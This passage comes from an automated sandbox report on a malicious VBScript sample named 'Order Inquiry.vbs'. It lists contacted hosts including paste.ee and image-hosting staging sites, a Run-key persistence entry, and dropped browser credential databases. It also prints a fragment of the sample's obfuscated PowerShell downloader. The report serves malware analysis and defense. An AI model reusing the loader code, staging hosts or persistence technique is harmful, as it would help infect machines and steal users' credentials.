          https://www.ecosia.org/newtab/AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • URL Reputation: safe
          		unknown
          https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brtmpB97.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://www.office.com/LRAddInProcess32.exe, 00000009.00000002.1681596776.00000000034CE000.00000004.00000800.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://ac.ecosia.org/autocomplete?q=AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • URL Reputation: safe
          		unknown
          https://paste.ee/_wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://uploaddeimagens.com.brpowershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://paste.ee/d/3dasYzwscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          https://analytics.paste.ee;wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://aka.ms/pscore68powershell.exe, 00000003.00000002.1937420985.000001E4CFD12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmpfalse
          • URL Reputation: safe
          		unknown
          https://support.mozilla.orgtmpB97.tmp.dat.9.drfalse
          • Avira URL Cloud: safe
          		unknown
          http://whatismyipaddressnow.coAddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drfalse
          • URL Reputation: safe
          		unknown
          https://paste.ee/Hwscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://themes.googleusercontent.comwscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		unknown
          https://whatismyipaddressnow.coAddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          208.95.112.1
          		ip-api.comUnited States
          		53334TUT-ASUStrue
          188.114.97.3
          		paste.eeEuropean Union
          		13335CLOUDFLARENETUStrue
          188.114.96.3
          		whatismyipaddressnow.coEuropean Union
          		13335CLOUDFLARENETUSfalse
          104.16.185.241
          		icanhazip.comUnited States
          		13335CLOUDFLARENETUSfalse
          93.123.39.71
          		unknownBulgaria
          		43561NET1-ASBGfalse

          General Information

          Joe Sandbox version:40.0.0 Tourmaline
          Analysis ID:1457271
          Start date and time:2024-06-14 15:14:01 +02:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 7m 33s
          Hypervisor based Inspection enabled:false
          Report type:light
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Number of analysed new started processes analysed:22
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:Order Inquiry.vbs
          Detection:MAL
          Classification:mal100.spre.troj.spyw.expl.evad.winVBS@21/25@6/5
          EGA Information:
          • Successful, ratio: 50%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 0
          • Number of non-executed functions: 0
          Cookbook Comments:
          • Found application associated with file extension: .vbs

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
          • TCP Packets have been reduced to 100
          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
          • Execution Graph export aborted for target powershell.exe, PID 7772 because it is empty
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
          • Report size getting too big, too many NtOpenFile calls found.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

          Simulations

          Behavior and APIs

          TimeTypeDescription
          09:15:03API Interceptor42x Sleep call for process: powershell.exe modified
          09:15:17API Interceptor79x Sleep call for process: AddInProcess32.exe modified
          15:15:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path \\tsclient\C\Program Files\aburrar.vbs
          15:15:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path \\tsclient\C\Program Files\aburrar.vbs

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASNs

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AddInProcess32.exe.log

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):1616
          Entropy (8bit):5.346184626026755
          Encrypted:false
          SSDEEP:48:MxHKlYHKh3oPtHo6hAHKzePHcHHHKAHKx1qHxLHVHj:iqlYqh3oPtI6eqzG8nqAqxwRL1D
          MD5:35691637EEF06C3561696DC72CB1281C
          SHA1:BD00A3772D8C98F3318B3CEB8A85AFAA79252B80
          SHA-256:E7C8BB0ED4357F81D6B6FAD015E6767834D693336C561F45ACCFB7B99614B266
          SHA-512:F29AC88B0F592CF26E7B0F6EBC1D0FDE3DAA02F8FCE9D2BF632E6823EC5AA0BA4D6CD2AB801424EF1578E947F00BD1B20A7175B45DFC20A28A317906EAB2FA24
          Malicious:false
          Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Managemen

          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\3dasY[1].txt

          Download File
          Process:C:\Windows\System32\wscript.exe
          File Type:ASCII text, with very long lines (11457), with CRLF line terminators
          Category:dropped
          Size (bytes):13771
          Entropy (8bit):4.688734205600574
          Encrypted:false
          SSDEEP:384:btmLndV4uQ1Qxfl4YpSd+mMMG9G03XVB8H+4yRylVpPgRHVHzvsRnZZ+kOi:iVPkQfllSg3MGs03XVBTLWVgHSCkn
          MD5:06087157AEEB6BC457DC48D172E436A2
          SHA1:A44A440729975DAA0A720692E49797E127E8B0D5
          SHA-256:B463AF4A4D68590AD381817E1FDD554A2F6194A804889107B0007F739C471E2A
          SHA-512:70873E44939258ED456BE90FD57383AE2B82F8A735061F2922B7E304F6A644A0A8F16B2C474BEB0CCAAD037EE1270358D93D957B21EB2DBD589B890D95458C32
          Malicious:false
          Preview:.. dim posteridade , subface , berlinense , malhorquino , dionina , Cama , dionina1.. subface = " ".. berlinense = "" & malhorquino & subface & malhorquino & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTre" & malhorquino & subface & malhorquino & "QBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTre" & malhorquino & subface & malhorquino & "QB3DgTreC0DgTreTwBiDgTreGoDgTre" & malhorquino & subface & malhorquino & "QBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTre" & malhorquino & subface & malhorquino & "QB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTre" & malhorquino & subface & malhorquino & "QBuDgTreHQDgTreOwDgTregDg

          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:data
          Category:dropped
          Size (bytes):64
          Entropy (8bit):1.1940658735648508
          Encrypted:false
          SSDEEP:3:NlllulN7rlz:NllU
          MD5:60800FE3EBA2CA09118A33A34BF00BD8
          SHA1:4DBA1472443F1B047803693393F61A2182695D2A
          SHA-256:D85FCEE5CD239F2EE739F27980E9EBB1BE0573405BC7C004DB4E828D1A2D50A0
          SHA-512:AFD4B6861BD4A06C23FEC68375FD4B012E8A456ED8EEF708B3F50C6FCD40D7B599B9967EDCFF9E917F9B8BF567ED2B6C5B7EE83AA2F6965A6D02BB1DABB9010F
          Malicious:false
          Preview:@...e................................................@..........

          C:\Users\user\AppData\Local\Temp\24a4ohrz.default-release\cert9.db

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 7, database pages 7, cookie 0x5, schema 4, UTF-8, version-valid-for 7
          Category:dropped
          Size (bytes):229376
          Entropy (8bit):0.6434294034339584
          Encrypted:false
          SSDEEP:384:A1zkVmvQhyn+Zoz67wNlvMM4333JCN87/LKX15kuv:AhjMmCqR
          MD5:515AEBFD1A85F4A59C3009D04D95D765
          SHA1:67593344CBEF68DB6F90AD02E4FB658036455FAF
          SHA-256:8FD38413C29B8801CF5C5C13027786907F4D3D2F03CB5ADC25BF43B860D13DF0
          SHA-512:CAFB98EB2573E6898DC00F23B683F576C6852EEB99C135FBF27045932E0DBBF749159EA13876718CAEA7C06960762CEADCF2307F66DFA7CB9A88AB1EA2E1CE8B
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j......z..{...{.{j{*z.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\24a4ohrz.default-release\key4.db

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 32768, file counter 2, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 2
          Category:dropped
          Size (bytes):294912
          Entropy (8bit):0.08432026317203951
          Encrypted:false
          SSDEEP:192:5va0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vD:51zkVmvQhyn+Zoz67+
          MD5:C444D5B9503F9CCFA9750AB3D51848E9
          SHA1:FFF755261E04C7502AF2F172DE3752D9458100FE
          SHA-256:66EA7282C9A15E75F5F52CB5D745FD1B4830045EB70D99AB4F07744A67E0879E
          SHA-512:E22CC4F41EC10146718E2767B68DCB20CF02AEC55DA8686988A16350045D6A31B9CDF16B7329EE436E9DBF1795699809819FEC2E7D9D460B046FAEC65BC48334
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h5ze3qi.xk1.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_naao5b22.0uk.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syl04dt5.dtd.psm1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uu4ycpno.as2.ps1

          Download File
          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          File Type:ASCII text, with no line terminators
          Category:dropped
          Size (bytes):60
          Entropy (8bit):4.038920595031593
          Encrypted:false
          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
          MD5:D17FE0A3F47BE24A6453E9EF58C94641
          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
          Malicious:false
          Preview:# PowerShell test file to determine AppLocker lockdown mode

          C:\Users\user\AppData\Local\Temp\tmp1F34.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
          Category:dropped
          Size (bytes):98304
          Entropy (8bit):0.08235737944063153
          Encrypted:false
          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmp3198.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):40960
          Entropy (8bit):0.8553638852307782
          Encrypted:false
          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
          MD5:28222628A3465C5F0D4B28F70F97F482
          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmp31D7.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.8475592208333753
          Encrypted:false
          SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBOF30AvJ3qj/880C4pwE1:TeAFawNLopFgU10XJBORJ6px4p7
          MD5:BE99679A2B018331EACD3A1B680E3757
          SHA1:6E6732E173C91B0C3287AB4B161FE3676D33449A
          SHA-256:C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
          SHA-512:9CFE1932522109D73602A342A15B7326A3E267B77FFF0FC6937B6DD35A054BF4C10ED79D34CA38D56330A5B325E08D8AFC786A8514C59ABB896864698B6DE099
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmp448A.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
          Category:dropped
          Size (bytes):106496
          Entropy (8bit):1.1373607036346451
          Encrypted:false
          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
          MD5:64BCCF32ED2142E76D142DF7AAC75730
          SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
          SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
          SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
          Malicious:false
          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmp5604.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):159744
          Entropy (8bit):0.5394293526345721
          Encrypted:false
          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
          MD5:52701A76A821CDDBC23FB25C3FCA4968
          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
          Malicious:false
          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmp6720.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):159744
          Entropy (8bit):0.5394293526345721
          Encrypted:false
          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
          MD5:52701A76A821CDDBC23FB25C3FCA4968
          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
          Malicious:false
          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmp7752.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):20480
          Entropy (8bit):0.37202887060507356
          Encrypted:false
          SSDEEP:12:TLiN6CZhDu6MvDOF5yEHFxOUwa5qguYZ75fOS2Rccog2IccogL:TLiwCZwE8I6Uwcco5fB2r2oL
          MD5:4D950F6445B3766514BA266D6B1F3325
          SHA1:1C2B99FFD0C9130C0B51DA5349A258CA8B92F841
          SHA-256:765D3A5B0D341DDC51D271589F00426B2531D295CCC2C2DE10FDD4790C796916
          SHA-512:AD0F8D47ABBD2412DC82F292BE5311C474E0B18C1022CAAE351A87ECD8C76A136831D4B5303C91DF0F8E68A09C8554E378191782AA8F142A7351EDB0EEF65A93
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j..........g.....4....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmp77A1.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
          Category:dropped
          Size (bytes):106496
          Entropy (8bit):1.1373607036346451
          Encrypted:false
          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
          MD5:64BCCF32ED2142E76D142DF7AAC75730
          SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
          SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
          SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
          Malicious:false
          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmpA565.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
          Category:dropped
          Size (bytes):51200
          Entropy (8bit):0.8746135976761988
          Encrypted:false
          SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
          MD5:9E68EA772705B5EC0C83C2A97BB26324
          SHA1:243128040256A9112CEAC269D56AD6B21061FF80
          SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
          SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
          Malicious:false
          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

          C:\Users\user\AppData\Local\Temp\tmpB97.tmp.dat

          Download File
          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
          Category:dropped
          Size (bytes):5242880
          Entropy (8bit):0.03708713717387235
          Encrypted:false
